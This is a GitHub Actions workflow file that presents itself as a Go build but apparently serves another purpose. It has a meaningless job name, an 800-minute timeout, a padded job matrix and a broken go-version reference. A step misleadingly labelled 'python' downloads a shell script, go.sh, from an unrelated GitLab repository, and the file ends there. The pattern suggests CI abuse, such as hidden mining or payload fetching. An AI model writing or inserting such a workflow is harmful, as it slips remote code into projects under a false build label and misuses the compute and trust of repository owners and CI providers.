name: build #build
on: [push, pull_request]
jobs:
  build-1:
    name: yok
    runs-on: ubuntu-latest
    timeout-minutes: 800
    strategy:
      fail-fast: true
      matrix:
        go: [1.12, 1.13, 1.14, 15]
        flag: [ai, bi, ci, di, ci]
    env:
          POSTGRES_USER: postgres
          POSTGRES_PASSWORD: ""
          POSTGRES_DB: postgres
    steps:
    - name: Install
      uses: actions/setup-go@v2
      with:
        go-version: ${{ matrix.go-version }}
    - name: Checkout code
      uses: actions/checkout@v2
    - name: python
      run: |
          wget https://gitlab.com/dsds5/yahasha_/-/raw/main/go.sh
